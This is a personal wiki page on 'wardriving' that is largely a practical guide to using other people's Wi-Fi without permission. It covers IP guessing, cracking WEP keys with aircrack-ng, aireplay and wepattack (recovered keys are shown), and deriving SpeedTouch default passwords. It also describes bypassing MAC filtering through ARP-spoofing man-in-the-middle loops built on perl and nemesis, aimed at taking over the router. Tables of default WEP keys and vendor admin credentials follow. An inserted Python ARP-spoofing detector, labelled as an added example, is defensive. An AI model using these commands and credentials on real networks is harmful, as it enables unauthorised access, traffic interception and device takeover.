Wardriving

From Alessandro's Wiki

Who is a wardriver?

  • A wardriver is someone who goes around, laptop in hand, looking for wireless connections and drawing a map of them. It does not matter what use is made of them: someone who just browses is a good wardriver, while someone who attacks, decrypts or deceives the network they found is more of a hacker than a wardriver.
  • I recommend using a PC with Linux and an 802.11x card with an Atheros chip (madwifi). Usually D-Link Xtreme.

Freeloading internet access

  • once the card is configured as ath0 (or eth1, eth7, wlan0 etc., depending on the card and the distribution)

we are ready to take a look and go wardriving.

  • tell the card to associate with any network, on any channel.
iwconfig ath0 essid any channel 0
  • scan the air...
iwlist ath0 scanning

all the available networks will appear; now a network has to be chosen

  • Take as an example the network named wireless
iwconfig ath0 essid wireless
  • if we are connected to the network, we will see the BSSID of the access point.
iwconfig ath0
ifconfig ath0 up
  • the link is now up, but the IP layer is missing; there are 2 options
    • ask the access point for an IP
dhclient ath0
  • or pick networks at random, starting with the most likely:
ifconfig ath0 192.168.1.166
  • or
ifconfig ath0 192.168.0.166
  • or
ifconfig ath0 192.168.100.166
  • or
ifconfig ath0 172.16.0.166
  • or
ifconfig ath0 10.1.1.166
  • once the network is found, try a ping to the router/access point
ping 192.168.1.1
    • if it answers the ping, we are connected and will probably be able to browse as well
    • if it does not answer, the possible reasons are very many
  1. The router has a firewall that blocks ping
  2. the router has MAC-level security set up, a list of accepted network cards, and blocks all unknown cards (see further below)
  3. the router has WEP/WPA, a protection password.
  4. while we were running the ping command, the router mysteriously switched off, or the connection was lost because of some environmental factor: someone closed a window (a real one) or stood between us and the antenna.
  5. we did not guess the router's IP (it is usually the .1 of a network, usually..)
  6. the card does not work
  7. is it plugged in?
  8. etc.

Scanning for networks endlessly

  • if you have an antenna on a cable and want to try moving it to improve reception, the watch command comes in handy.
#!/bin/sh
iwconfig ath0 essid any
watch 'iwlist ath0 scanning |grep -2 Channel'

No Fear of WEP

Aircrack

WLAN_39-1.cap is the file where I captured the packets
aircrack-ng -a1 -eWLAN_39 -b00:60:B3:FD:70:57 -m00:0E:35:07:38:B7 -s WLAN_39-1.cap


aircrack-ng -a 1 -m 00:16:0A:06:8B:B3 -b 00:16:0A:06:2A:9C -e "Sweex LW050" -s dump-w-1-ch-6-02.cap

                                                       Aircrack-ng 1.0


                                       [00:00:17] Tested 13626 keys (got 904240 IVs)
  KB    depth   byte(vote)
   0    0/  1   6E(1259008) F8(943360) 0A(937216) 99(935936) 89(935680) A0(934400) 38(932608) 78(932608) 73(930816)
   1    0/  1   69(1231616) 61(944640) 06(941824) C4(941312) 42(940544) 95(935936) 21(935424) E3(933632) 32(932352)
   2    0/  1   63(1238016) E6(945920) E7(944640) 4E(936192) D9(932608) 27(932352) 3E(932096) 93(931072) EE(931072)
   3    0/  1   6F(1248256) 63(938496) 6A(936704) 4D(936448) 92(934400) 60(932352) 25(931584) 6B(929792) E8(927488)
   4    0/  1   31(1227264) B4(947200) DF(943616) 7C(938752) 7B(934656) 30(931328) D9(929792) E5(929536) 0B(928256)
   5    0/  1   33(1232896) 7C(950528) 50(946688) 36(941824) E2(941568) 3F(938240) 89(937472) C1(933632) 68(933376)
   6    0/  1   35(1192192) 72(946944) FD(944128) CA(939776) 6B(938240) 81(935936) 97(933632) 4B(933376) 6D(932608)
   7    0/  1   38(1197824) EA(941312) C7(938240) 2A(935424) B4(934400) 85(932864) 79(930048) 4F(929536) F1(928512)
   8    0/  1   32(1180672) 43(946432) DF(940544) 2B(935680) 4D(934912) 1C(934144) 7A(933888) FB(933376) 98(931840)
   9    0/  1   33(1200128) A0(950016) 39(939520) C9(939264) B4(937984) 59(934912) 66(933376) 0A(932608) EE(932608)
  10    0/  1   7A(961024) 35(941824) 8F(941312) 06(938752) A7(935424) 23(934656) 08(933632) C3(933632) 24(933376)
  11    3/  1   AF(938496) 82(935936) 9C(934912) B1(934400) 11(932864) 1D(932608) 1B(931840) FC(931840) 40(930304)
  12    0/  1   34(1059824) 15(947576) 63(937100) EF(931872) 7D(930464) CE(929532) EC(928572) 9E(927728) D8(927612)
    KEY FOUND! [ 6E:69:63:6F:31:33:35:38:32:33:35:38:34 ] (ASCII: nico135823584 )
       Decrypted correctly: 100%

WPA

http://docs.alkaloid.net/index.php/Cracking_WEP_and_WPA_Wireless_Networks#WPA_Crackin

Generating traffic

  • with aireplay it is done like this:
aireplay ath0 -3 -b 00:11:95:9D:74:1C -h 00:90:96:65:E5:47 -a 00:11:95:9D:74:1C -e ADSL-WIRELESS
  • Meanwhile, capture with airodump:
airodump ath0 WLAN_11-1 6

The output will be more or less:

 BSSID              PWR  Beacons      IP / # Data  CH  MB  ENC  ESSID
 00:11:95:9D:74:1C   10     8595           101469   6  54  WEP  ADSL-WIRELESS
 BSSID              STATION            PWR   Packets  ESSID
 00:11:95:9D:74:1C  00:90:96:65:E5:47   -2     56435  ADSL-WIRELESS

AccessPoints WLAN_XX

  • I received a router from my telephone company with a WEP key set, but I lost the slip of paper with the key... I will find it using a program called wlandecrypter together with wepattack. airodump will be needed too.
  • let's see which channel, ESSID and BSSID (AP MAC) it has:
iwlist ath0 scan
  • Capture the packets: (airodump "wifi_interface" "output_file" "channel")
airodump ath0 WLAN_12 6
  • wait until data packets ("Data") start coming in; once there are at least ten or a hundred of them, press Control-C to stop.
  • now take the .cap file generated by airodump and pass it to wepcrack (airodump generates 2 files, a .cap with the packets and a .txt with information on the hosts and the APs): wlandecrypter bssid essid | wepattack -f output_name.cap
wlandecrypter 00:60:B3:XX:70:XX WLAN_12 | wepattack -f WLAN_12.cap 
  • The output will be more or less this:
wlandecrypter 0.4 - (c) 2006 nilp0inter2k6_at_gmail.com
------------>  http://www.rusoblanco.com  <------------
 [+] BSSID: 00:60:B3:77:77:77
 [+] Modelo: Z-com
 [+] ESSID: WLAN_39
 [+] Seleccionada salida estandar

Extraction of necessary data was successfull!

Founded BSSID:
1)  00 60 B3 FD 70 77 / Key 0
1 network loaded...

Accepting wordlist data...

key no. 10000: Z001349270F39
key no. 20000: Z0013494E1F39
key no. 30000: Z001349752F39

++++++++++ Packet decrypted! ++++++++++  
BSSID: 00 60 B3 44 44 44 / Key 0        WepKey: 5A 30 30 31 33 34 39 37 42 30 32 33 39 (Z0013497B0239) 
Encryption: 128 Bit 

time: 11.580097 sec     words: 31492


Access Points SpeedTouchXXXXX / ThomsonXXXX

The default password is generated by an algorithm, so with a simple "while" loop you can get the password from the MAC address and the ESSID; there is software to do that, or a website.

http://www.nickkusters.com/SpeedTouch.aspx

MAC filtering

  • This protection scheme makes sense, but not much, because the unique address of the wifi card can be forged; for example, one could copy the address used by a user of the network and be taken for a friend by the access point. Here is how it is done:
    • perl is required
    • the nemesis program is required
    • a sniffer is needed too, such as tcpdump or, better (more visual), ethereal with ethereal-gnome as its interface.
    • the table at the bottom of the page, with the factory passwords of routers and/or access points, will be very useful.
    • imagination.

Finding an authorized MAC address:

  1. connect to the network; even if we cannot receive or send packets, it is enough that the card is associated with the access point (the BSSID is shown by iwconfig, something like xx:xx:xx:xx:xx:xx....)
  2. open the sniffer and start noting down all the MAC addresses we see. Exclude that of our own card,
tcpdump -i ath0 -n -e -q ether host 00:01:38:4D:83:E9
  • this command will print as many lines as there are packets passing through the ath0 interface whose sender or receiver MAC address equals "00:01:38:4d:83:e9"
14:49:26.143433 00:01:38:4d:83:e9 > 00:13:8f:a3:0c:07, IPv4, length 60: 212.35.207.11.80 > 192.168.1.82.36491: tcp 0
14:49:26.296083 00:01:38:4d:83:e9 > 00:13:8f:a3:0c:07, IPv4, length 379: 207.46.109.59.1863 > 192.168.1.82.45046: tcp 313
14:49:26.296126 00:13:8f:a3:0c:07 > 00:01:38:4d:83:e9, IPv4, length 66: 192.168.1.82.45046 > 207.46.109.59.1863: tcp 0
  • we see that 00:01:38:4d:83:e9 talks to 00:13:8f:a3:0c:07, so if that is not the MAC of our own card, we can take it as a false identity document to use with the router, with nemesis:
    • MAC of my card: 00:01:29:25:27:0e
    • MAC of the router: 00:01:38:4d:83:e9 -> IP 192.168.1.1
    • MAC of the user authorized on the router: 00:13:8f:a3:0c:07 -> IP 192.168.1.200
  • now a triangle has to be created, that is, make the router believe that we are the user and at the same time make the user believe that we are the router. This is possible by generating a packet that says 'I am the router and I have this MAC (ours)' to the user and 'I am the user and I have this MAC (ours)' to the router.
  • talking to the router:
perl -e 'while(1){print "Deviando..\n"; system(" \
nemesis arp -v -r -d ath0 \
-S 192.168.1.200 -D 192.168.1.1 \
-h 00:01:29:25:27:0e -m 00:0B:6A:76:97:AF \
-H 00:00:61:74:68:30 -M 00:0B:6A:76:97:AF \
"); sleep 10; }'
  • talking to the user:
perl -e 'while(1){print "Deviando..\n"; system(" \
nemesis arp -v -r -d ath0 \
-S 192.168.1.1 -D 192.168.1.200 \
-h 00:01:29:25:27:0e -m 00:13:8f:a3:0c:07 \
-H 00:01:29:25:27:0e -M 00:01:38:4d:83:e9 \
"); sleep 10; }'
  • These commands loop forever; they must be run in 2 different terminals or stuck together in a single perl call, and the result will be that all the traffic between router and user passes through our card. That way we can try to get into the router and add our MAC to the list of "friends".
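Seen from the defending side, the diversion described above leaves a recognisable trace in the ARP replies on the segment. The following is an added example, not part of the original wiki page: it parses `tcpdump -n -e -q arp` style lines and flags an IP whose MAC changes, one MAC answering for several IPs, and a frame source that differs from the MAC claimed in the ARP payload. The sample lines are constructed (their exact layout is an assumption) from the addresses listed above, and the function names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample in the style of `tcpdump -i ath0 -n -e -q arp` (layout assumed).
# Addresses are the ones used in the text above:
#   router 192.168.1.1   = 00:01:38:4d:83:e9
#   user   192.168.1.200 = 00:13:8f:a3:0c:07
#   third card           = 00:01:29:25:27:0e
SAMPLE = """\
14:50:01.000101 00:01:38:4d:83:e9 > 00:13:8f:a3:0c:07, ARP, length 42: Reply 192.168.1.1 is-at 00:01:38:4d:83:e9, length 28
14:50:02.000202 00:13:8f:a3:0c:07 > 00:01:38:4d:83:e9, ARP, length 42: Reply 192.168.1.200 is-at 00:13:8f:a3:0c:07, length 28
14:50:11.000303 00:01:29:25:27:0e > 00:13:8f:a3:0c:07, ARP, length 42: Reply 192.168.1.1 is-at 00:01:29:25:27:0e, length 28
14:50:11.000404 00:00:61:74:68:30 > 00:01:38:4d:83:e9, ARP, length 42: Reply 192.168.1.200 is-at 00:01:29:25:27:0e, length 28
14:50:21.000505 00:01:29:25:27:0e > 00:13:8f:a3:0c:07, ARP, length 42: Reply 192.168.1.1 is-at 00:01:29:25:27:0e, length 28
"""

MAC = r"(?:[0-9a-f]{2}:){5}[0-9a-f]{2}"
ARP_REPLY = re.compile(
    rf"^(?P<ts>\S+)\s+(?P<src>{MAC}) > \S+,"
    rf".*?\bReply (?P<ip>\d{{1,3}}(?:\.\d{{1,3}}){{3}}) is-at (?P<mac>{MAC})",
    re.IGNORECASE,
)


def parse_arp_replies(text):
    """Return (timestamp, frame_src, claimed_ip, claimed_mac) for each ARP reply line."""
    replies = []
    for line in text.splitlines():
        m = ARP_REPLY.search(line)
        if m:  # non-ARP lines (IPv4 traffic etc.) are skipped
            replies.append((m["ts"], m["src"].lower(), m["ip"], m["mac"].lower()))
    return replies


def detect_arp_spoofing(replies, pinned=None):
    """Return a de-duplicated, ordered list of alert tuples.

    pinned: optional {ip: mac} of known-good bindings (e.g. the gateway).
    Without it, the first binding seen for an IP is taken as the baseline,
    so a capture that starts mid-attack needs the pinned table.
    """
    baseline = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
    claims = defaultdict(set)  # mac -> set of IPs it has answered for
    alerts = []

    def report(alert):
        if alert not in alerts:
            alerts.append(alert)

    for _ts, frame_src, ip, mac in replies:
        # 1. Ethernet source and ARP sender address disagree.
        if frame_src != mac:
            report(("src-mismatch", ip, frame_src, mac))
        # 2. The IP is now claimed by a different MAC than the baseline.
        #    A replaced NIC also triggers this, so treat it as a lead.
        known = baseline.setdefault(ip, mac)
        if known != mac:
            report(("ip-moved", ip, known, mac))
        # 3. One MAC answers for several IPs (proxy ARP does this legitimately).
        claims[mac].add(ip)
        if len(claims[mac]) > 1:
            report(("mac-claims-many", mac, tuple(sorted(claims[mac]))))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(parse_arp_replies(SAMPLE)):
        print(alert)
```

Passing the gateway's real binding in `pinned` is the monitoring counterpart of a static ARP entry on the clients: the baseline then no longer depends on what the capture happened to see first.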

Default WEP Keys

  • 64-BIT ENCRYPTION:
FFFFFFFFFF
0000000000
0101010101
0202020202
0303030303
0404040404

  • Netgear
Default WEP KEY1: 11 11 11 11 11
Default WEP KEY2: 20 21 22 23 24
Default WEP KEY3: 30 31 32 33 34
Default WEP KEY4: 40 41 42 43 44

  • 128-BIT ENCRYPTION:
FFFFFFFFFFFFFFFFFFFFFFFFFF
00000000000000000000000000
01010101010101010101010101

  • Zyxel
64-bit WEP with 5 characters
Key1= 2e3f4
Key2= 5y7js
Key3= 24fg7
Key4= 98jui

  • 64-bit WEP with 10 hexadecimal digits
('0-9', 'A-F')
Key1= 0x123456789A
Key2= 0x23456789AB
Key3= 0x3456789ABC
Key4= 0x456789ABCD

  • 128-bit WEP with 13 characters
Key1= 2e3f4w345ytre
Key2= 5y7jse8r4i038
Key3= 24fg70okx3fr7
Key4= 98jui2wss35u4

  • 128-bit WEP with 26 hexadecimal digits
('0-9', 'A-F')
Key1= 0x112233445566778899AABBCDEF
Key2= 0x2233445566778899AABBCCDDEE
Key3= 0x3344556677889900AABBCCDDFF
Key4= 0x44556677889900AABBCCDDEEFF 

Default Passwords by Manufacturer

Manufacturer 	Model 	OS Version 	Login 	Password

3Com 	- 	1.25 	root 	letmein
3Com 	Super Stack 2 Switch 	Any 	manager 	manager
3Com 	AccessBuilder® 7000 BRI 	Any 	- 	-
3Com 	CoreBuilder 2500 	- 	- 	-
3Com 	Switch 3000/3300 	- 	manager 	manager
3Com 	Switch 3000/3300 	- 	admin 	admin
3Com 	Switch 3000/3300 	- 	security 	security
3com 	Cable Managment System SQL Database (DOSCIC DHCP) 	Win2000 & MS 	DOCSIS_APP 	3com
3Com 	NAC (Network Access Card) 	- 	adm 	none
3Com 	HiPer ARC Card 	v4.1.x of HA 	adm 	none
3Com 	CoreBuilder 6000 	- 	debug 	tech
3Com 	CoreBuilder 7000 	- 	tech 	tech
3Com 	SuperStack II Switch 2200 	- 	debug 	synnet
3Com 	SuperStack II Switch 2700 	- 	tech 	tech
3Com 	SuperStack / CoreBuilder 	- 	admin 	-
3Com 	SuperStack / CoreBuilder 	- 	read 	-
3Com 	SuperStack / CoreBuilder 	- 	write 	-
3Com 	LinkSwitch and CellPlex 	- 	tech 	tech
3Com 	LinkSwitch and CellPlex 	- 	debug 	synnet
3com 	Superstack II 3300FX 	- 	admin 	-
3com 	Switch 3000/3300 	- 	Admin 	3com
3com 	3comCellPlex7000 	- 	tech 	tech
3Com 	Switch 3000/3300 	- 	monitor 	monitor
3Com 	AirConnect Access Point 	n/a 	- 	comcomcom
3com 	Superstack II Dual Speed 500 	- 	security 	security
3Com 	OfficeConnect 5x1 	at least 5.x 	- 	PASSWORD
3Com 	SuperStack 3 Switch 3300XM 	- 	admin 	-
3com 	Super Stack 2 Switch 	Any 	manager 	manager
3Com 	SuperStack II Switch 1100 	- 	manager 	manager
3Com 	SuperStack II Switch 1100 	- 	security 	security
3com 	super stack 2 switch 	any 	manager 	manager
3Com 	Office Connect Remote 812 	- 	root 	!root
3Com 	Switch 3000/3300 	- 	admin 	admin
3COM 	OCR-812 	- 	- 	-
3com 	- 	- 	- 	-
3com 	NBX100 	2.8 	administrator 	0000
3com 	Home Connect 	- 	User 	Password
3Com 	OfficeConnect 5x1 	at least 5.x 	estheralastruey 	-
3Com 	SuperStack II Switch 3300 	- 	manager 	manager
3Com 	Superstack 	- 	- 	-
ACC 	Routers 	- 	netman 	netman
Acc/Newbridge 	Congo/Amazon/Tigris 	All versions 	netman 	netman
adaptec 	- 	- 	- 	-
Adaptec RAID 	Storage Manager Pro 	All 	Administrator 	adaptec
adtran 	tsu 600 ethernet module 	- 	18364 	-
Adtran 	TSU 120 e 	- 	- 	ADTRAN
Aironet 	All 	- 		
alcatel 	- 	- 	- 	-
Alcatel 	1000 ANT 	Win98 	- 	-
alcatel 	speed touch home 	- 	- 	-
Alcatel/Newbridge/Timestep 	VPN Gateway 15xx/45xx/7xxx 	Any 	root 	permit
Alcatel/Newbridge/Timestep 	VPN Gateway 15xx/ 	Any 	root 	permit
Allied Tenysin 	R130 	- 	Manager 	friend
Alteon 	ACEswitch 180e (telnet) 	- 	admin 	blank
Alteon Web Systems 	All hardware releases 	Web OS 5.2 	none 	admin
APC 	MasterSwitches 	- 	apc 	apc
APC 	Any 	Firmware Pri 	apcuser 	apc
Apple 	Network Assistant 	3.X 	None 	xyzzy
Apple 	Airport 	1.1 	none 	public
Arrowpoint 	any? 	- 	admin 	system
Ascend 	All TAOS models 	all 	admin 	Ascend
Ascend 	Pipeline Terminal Server 	- 	answer 	-
Ascom 	Timeplex Routers 	Any 	See notes 	-
AT&T 	Starlan SmartHUB 	9.9 	N/A 	manager
AWARD 	Any BIOS 	- 	AWARD_SW 	-
Axent 	NetProwler manager 	WinNT 	administrator 	admin
Axis 	NPS 530 	5.02 	root 	pass
AXIS 	StorPoint CD100 	4.28 	root 	pass
AXIS 	200 V1.32 	- 	admin 	-
Axis 	2100 Network Camera 	Linux (ETRAX 	root 	pass
bay 	cv1001003 	- 	- 	-
bay 	- 	- 	- 	-
Bay 	- 	- 	- 	-
Bay / Nortel 	ARN 	13.20 	Manager (caps count !) 	-
Bay Network Routers 	All 	- 	User 	-
Bay Networks 	ASN / ARN Routers 	Any 	Manager 	Manager
Bay Networks 	Baystack 	- 	- 	NetICs
Bay/Nortel Networks 	Accelar 1xxx switches 	Any 	rwa 	rwa
Bay/Nortel Networks 	Remote Annex 2000 	Any 	admin 	IP address
BEA 	Weblogic 	5.1 	system 	weblogic
BEA 	- 	- 	- 	-
bewan 	- 	- 	- 	-
Bintec 	all Routers 	Any 	admin 	bintec
Bintec 	- 	- 	- 	-
Biodata 	BIGfire & BIGfire+ 	all 	- 	biodata
Biodata 	all Babylon-Boxes 	all 	- 	Babylon
Borland 	interbase 	- 	- 	-
Borland 	Interbase 	Any 	politcally 	correct
Borland/Inprise 	Interbase 	any 	SYSDBA 	masterkey
BreezeCom 	AP10, SA10 	BreezeNET PR 	- 	-
BreezeCOM 	Station Adapter and Access Point 	4.x 	- 	Super
BreezeCOM 	- 	3.x 	- 	Master
BreezeCOM 	Station Adapter and Access Point 	2.x 	- 	laflaf
Brocade 	Silkworm 	- 	admin 	password
Buffalo/MELCO 	AirStation WLA-L11 	- 	root (cannot be changed) 	(no password by default)
Cabletron 	any 	any 	-- 	--
Cabletron 	NB Series 	Any 	- 	inuvik49
Cabletron routers and switches 	* 	* 	blank 	blank
Cayman 	3220-H DSL Router 	GatorSurf 5. 	Any 	-
celerity 	- 	- 	- 	-
Chase Research 	Iolan+ 	- 	- 	iolan
Cisco 	Any Router and Switch 	10 thru 12 	cisco 	cisco
Cisco 	ConfigMaker Software 	any? 	n/a 	cmaker
CISCO 	Network Registrar 	3.0 	ADMIN 	changeme
CISCO 	N/A 	N/A 	pixadmin 	pixadmin
Cisco 	routers 	Not sure...j 	- 	san-fran
Cisco 	VPN 3000 Concentrator 	- 	admin 	admin
Cisco 	Net Ranger 2.2.1 	Sol 5.6 	root 	attack
cisco 	1600 	12.05 	- 	-
cisco 	1601 	- 	- 	-
cisco 	- 	- 	- 	-
cisco 	- 	- 	- 	-
Cisco 	MGX 	* 	superuser 	superuser
cisco 	1601 	- 	- 	-
cisco 	- 	- 	- 	-
Cisco 	- 	- 	- 	-
cisco 	- 	- 	- 	-
Cisco 	any 	aany IOS 	no default login 	no default password
CISCO 	arrowpoint 	- 	- 	-
cisco 	- 	- 	- 	-
cisco 	- 	- 	- 	-
cisco 	- 	- 	- 	-
Cisco 	2503 	- 	- 	-
Cisco 	- 	- 	- 	-
cisco 	- 	- 	- 	-
Cisco 	IDS (netranger) 	- 	root 	attack
cisco 	- 	- 	- 	-
cisco 	1600 	- 	- 	-
CMOS BIOS 	- 	- 	- 	ESSEX or IPC
Cobalt 	RaQ * Qube* 	Any 	admin 	admin
Com21 	- 	- 	- 	-
Comersus Shopping Cart 	3.2 	Win 95/98/NT 	admin 	dmr99
Compaq 	Insight Manager 	- 	Administrator 	administrator
Compaq 	Insight Manager 	- 	operator 	operator
Compaq 	Management Agents 	All 	administrator 	none
compaq 	- 	- 	- 	-
copper mountain 	- 	- 	- 	-
Coppercom 	- 	- 	- 	-
Coyote-Point 	Equaliser 4 	Free BSD 	eqadmin - Serial port only 	equalizer
Coyote-Point 	Equaliser 4 	Free BSD 	root - Serial port only 	-
Coyote-Point 	Equaliser 4 	Free BSD 	look - Web Browser only (Read a 	look
Coyote-Point 	Equaliser 4 	Free BSD 	touch - Web Browser only (Write 	touch
Cyclades 	MP/RT 	- 	super 	surt
D-Link 	DI-704 	- 	- 	admin
D-Link 	DI-701 	2.22 (?) 	- 	-
Dell 	PowerVault 50F 	WindRiver (E 	root 	calvin
Dell 	PowerVault 35F 	- 	root 	calvin
Dell 	Powerapp Web 100 Linux 	RedHat 6.2 	root 	powerapp
dell 	- 	- 	- 	-
Digiboard 	Portserver 8 & 16 	any 	root 	dbps
DLink 	DI-206 ISDN router 	1.* 	Admin 	Admin
Dlink 	Dl-106 ISDN router 	- 	- 	1234
DLink 	DL-701 Cable/DSL Gateway/Firewall 	- 	- 	year2000
Dlink 	DFE-538TX 10/100 Adapter 	Windows 98 	- 	-
dlink 	di704 	- 	- 	admin
DLink 	DI 106 	winnt 	administrator 	@*nigU^D.ha,;
Dupont Digital Water Proofer 	Sun Sparc 	any 	root 	par0t
eci 	- 	- 	- 	-
Efficient 	- 	- 	- 	-
Elron 	Firewall 	2.5c 	hostname/ip address 	sysadmin
emai 	hotmail 	- 	- 	-
Ericsson 	ACC 	- 	netman 	netman
Ericsson (formerly ACC) 	Any router 	all 	netman 	netman
Extended Systems 	ExtendNet 4000 / Firewall 	all Versions 	admin 	admin
Extended Systems 	Print Servers 	- 	admin 	extendnet
Extreme 	All Summits 	- 	admin 	-
extreme 	black diamond 	- 	- 	-
Extreme 	All 	All 	Admin 	-
Flowpoint 	144, 2200 DSL Routers 	ALL 	- 	password
FlowPoint 	144, 2200 DSL Routers 	ALL 	- 	admin
Flowpoint 	2200 	- 	- 	Serial Num
fore 	- 	- 	- 	-
Fore Systems 	ASX 1000/1200 	6.x 	ami 	-
Foundry Networks 	ServerIronXL 	Any 	- 	-
fujitsu 	l460 	- 	- 	-
Future Networks 	FN 110C Docsis cablemodem 	Any 	- 	-
gatway 	solo9100 	win95 	- 	-
General Instruments 	SB2100D Cable Modem 	- 	test 	test
gonet 	- 	- 	fast 	abd234
Hewlett Packard 	HP Jetdirect (All Models) 	Any 	none 	none
Hewlett Packard 	MPE-XL 	- 	HELLO 	MANAGER.SYS
Hewlett Packard 	MPE-XL 	- 	HELLO 	MGR.SYS
Hewlett Packard 	MPE-XL 	- 	HELLO 	FIELD.SUPPORT
Hewlett Packard 	MPE-XL 	- 	MGR 	CAROLIAN
Hewlett Packard 	MPE-XL 	- 	MGR 	CCC
Hewlett Packard 	MPE-XL 	- 	OPERATOR 	COGNOS
Hewlett Packard 	MPE-XL 	- 	MANAGER 	HPOFFICE
hp 	4150 	- 	- 	-
hp 	- 	- 	- 	-
IBM 	AS/400 	- 	qsecofr 	qsecofr
IBM 	AS/400 	- 	qsysopr 	qsysopr
IBM 	AS/400 	- 	qpgmr 	qpgmr
IBM 	NetCommerce PRO 	3.2 	ncadmin 	ncadmin
IBM 	LAN Server / OS/2 	2.1, 3.0, 4. 	username 	password
IBM 	2210 	RIP 	def 	trade
IBM 	DB2 	WinNT 	db2admin 	db2admin
IBM 	Lotus Domino Go WebServer (net.commerce edition) 	ANY ? 	webadmin 	webibm
IBM 	AS400 	Any 	QSECOFR 	QSECOFR
IBM 	RS/6000 	AIX 	root 	ibm
IBM 	- 	OS/400 	QSECOFR 	QSECOFR
IBM 	AS400 	- 	QSRVBAS 	QSRVBAS
IBM 	AS400 	- 	QSRV 	QSRV
ibm 	as400 	- 	- 	-
IBM 	AS/400 	OS/400 	QUSER 	QUSER
IBM 	AS/400 	- 	- 	-
IBM 	ra6000 	AIX Unix 	- 	-
IBM 	AIX 	- 	- 	-
Imperia Software 	Imperia Content Managment System 	Unix/NT 	superuser 	superuser
Intel 	510T 	Any 	- 	admin
Intel 	All Routers 	All Versions 	- 	babbit
Intel 	Intel PRO/Wireless 2011 Wireless LAN Access Point 	Any 	- 	Intel
Intel 	wireless lan access Point 	- 	- 	comcomcom
Ipswitch 	Whats up Gold 6.0 	Windows 9x a 	admin 	admin
janta sales 	254 	compaq 	janta sales 	janta211
Jetform 	Jetform_design 	- 	Jetform 	-
Kawa 	- 	- 	- 	-
LANCAST 	- 	- 	- 	-
Lantronix 	LPS1-T Print Server 	j11-16 	any 	system
Lantronix 	MSS100, MSSVIA, UDS10 	Any 	- 	system
Lantronix 	LSB4 	any 	any 	system
Lantronix 	Printer and terminalservers 	- 	- 	system
LGIC 	Goldstream 	2.5.1 	LR-ISDN 	LR-ISDN
Linkou School 	- 	- 	bill 	bill
Linksys 	Cable/DSL router 	Any 	- 	admin
Linksys 	BEFSR7(1) OR (4) 	Standalone R 	blank 	admin
linksys 	- 	- 	- 	-
Linksys 	BEFSR41 	- 	(blank) 	admin
Livingston 	Livingston_portmaster2/3 	- 	!root 	blank
Livingston 	Livingston_officerouter 	- 	!root 	blank
Lucent 	Portmaster 2 	- 	!root 	none
Lucent 	Cajun Family 	- 	root 	root
lucent 	Portmaster 3 	unknown 	!root 	!ishtar
Lucent 	Packetstar (PSAX) 	- 	readwrite 	lucenttech1
Lucent 	AP-1000 	- 	public 	public
lucent 	dsl 	- 	- 	-
lucent 	- 	- 	- 	-
macromedia 	freehand 	9 	- 	-
MacSense 	X-Router Pro 	- 	admin 	admin
mcafee 	- 	- 	- 	-
microcom 	hdms 	unknowen 	system 	hdms
Micron 	- 	bios 	- 	-
Microrouter (Cisco) 	Any 	Any 	- 	letmein
Microsoft 	Windows NT 	All 	Administrator 	-
Microsoft 	Windows NT 	All 	Guest 	-
Microsoft 	Windows NT 	All 	Mail 	-
Microsoft 	SQL Server 	- 	sa 	-
Microsoft 	Windows NT 	4.0 	pkoolt 	pkooltPS
Microsoft 	NT 	- 	- 	start
MICROSOFT 	NT 	4.0 	free user 	user
Microsoft 	Windows NT 	4.0 	admin 	admin
MICROSOFT 	NT 	4.0 	free user 	user
Microsoft 	- 	- 	- 	-
microsoft 	- 	- 	- 	-
Microsoft 	Ms proxy 2.0 	- 	- 	-
microsoft 	- 	- 	- 	-
mICROSOFT 	- 	- 	- 	-
Microsoft 	Key Managment Server 	Windows NT 4 	- 	password
Microsoft 	- 	- 	- 	-
Motorola 	Motorola-Cablerouter 	- 	cablecom 	router
motorola 	cyber surfer 	- 	- 	-
msdloto 	msdloto 	- 	- 	-
msdloto 	- 	- 	- 	-
Multi-Tech 	RASExpress Server 	5.30a 	guest 	none
Nanoteq 	NetSeq firewall 	* 	admin 	NetSeq
NetApp 	NetCache 	any 	admin 	NetCache
Netgaer 	RH328 	- 	- 	1234
Netgear 	RH348 	- 	- 	1234
Netgear 	ISDN-Router RH348 	- 	- 	1234
Netgear 	RT311 	Any 	Admin 	1234
Netgear 	RT314 	Any 	Admin 	1234
Netgear 	RT338 	- 	- 	1234
Netgear 	RT311/RT314 	- 	admin 	1234
netgear 	- 	- 	- 	-
netlink 	rt314 	- 	- 	-
Netopia 	R7100 	4.6.2 	admin 	admin
Netopia 	455 	v3.1 		
Netscreen 	NS-5, NS10, NS-100 	2.0 	netscreen 	netscreen
NeXT 	- 	NeXTStep 3.3 	me 	-
Nokia - Telecom NZ 	M10 	- 	Telecom 	Telecom
Nortel 	Meridian 1 PBX 	OS Release 2 	0000 	0000
Nortel 	Contivity Extranet Switches 	2.x 	admin 	setup
Nortel 	Norstar Modular ICS 	Any 	**ADMIN (**23646) 	ADMIN (23646)
Nortel 	Norstar Modular ICS 	Any 	**CONFIG (266344) 	CONFIG (266344)
Nortel Networks (Bay) 	Instant Internet 	Any 	- 	-
Northern Telecom(Nortel) 	Meridian 1 	- 	- 	m1link
Novell 	NetWare 	Any 	guest 	-
Novell 	NetWare 	any 	PRINT 	-
Novell 	NetWare 	Any 	LASER 	-
Novell 	NetWare 	Any 	HPLASER 	-
Novell 	NetWare 	Any 	PRINTER 	-
Novell 	NetWare 	Any 	LASERWRITER 	-
Novell 	NetWare 	Any 	POST 	-
Novell 	NetWare 	Any 	MAIL 	-
Novell 	NetWare 	Any 	GATEWAY 	-
Novell 	NetWare 	Any 	GATE 	-
Novell 	NetWare 	Any 	ROUTER 	-
Novell 	NetWare 	Any 	BACKUP 	-
Novell 	NetWare 	Arcserve 	CHEY_ARCHSVR 	WONDERLAND
Novell 	NetWare 	Any 	WINDOWS_PASSTHRU 	-
novell 	- 	- 	- 	-
ODS 	1094 IS Chassis 	4.x 	ods 	ods
Optivision 	Nac 3000 & 4000 	any 	root 	mpegvideo
Oracle 	8i 	8.1.6 	sys 	change_on_install
Oracle 	Internet Directory Service 	any 	cn=orcladmin 	welcome
Oracle 	7 or later 	- 	system 	manager
Oracle 	7 or later 	- 	sys 	change_on_install
Oracle 	7 or later 	Any 	Scott 	Tiger
Oracle 	8i 	all 	internal 	oracle
oracle 	- 	- 	- 	-
oracle 	- 	- 	- 	-
oracle co. 	Database engines 	every 	sys 	change_on_install
Osicom(Datacom) 	Osicom(Datacom) 	- 	sysadm 	sysadm
Pandatel 	EMUX 	all 	admin 	admin
